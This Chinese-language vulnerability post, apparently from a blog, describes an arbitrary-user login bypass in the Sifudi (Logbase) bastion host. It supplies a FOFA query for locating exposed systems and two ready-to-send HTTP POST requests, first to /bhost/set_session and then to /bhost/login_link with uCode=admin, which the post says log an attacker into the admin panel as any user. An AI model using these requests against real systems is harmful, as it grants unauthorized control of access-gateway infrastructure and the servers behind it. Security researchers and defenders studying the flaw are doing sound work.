思福迪堡垒机-任意用户登录漏洞

# 思福迪堡垒机 任意⽤户登录漏洞

## 漏洞描述
思福迪堡垒机存在任意⽤户登录漏洞,恶意攻击者可以绕过堡垒机的密码登录验证机制,以任 意⽤户身份随意登录堡垒机Web管理界⾯,并可以正常的使⽤账户权限去操作。

## 漏洞影响

`思福迪堡垒机`

## FOFA

`”Logbase运维安全管理系统”`

## 漏洞复现

获取INFO字段,u1参数值为⽤户名

“`bash
POST /bhost/set_session HTTP/1.1
Host: xxx.xxx.xxx.xx
u1=admin&m1=
“`
获得:`{“result”:true,”info”:”1562205376847″,”ErrMsg”:””}`

带⼊INFO字段进⼊如下请求的 a0 参数值中,uCode参数值为⽤户名

“`bash
POST /bhost/login_link HTTP/1.1
Host: xxx.xxx.xxx.xxx
a0=1562205376847&a1=&a10=2019-01-
01+10:10:10&ha=CADFDF26E649FB6284D2FD424BD294B6&uCode=admin&vdcode=
“`

利用后即可登录后台

![](resource/任意用户登录漏洞/media/1.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容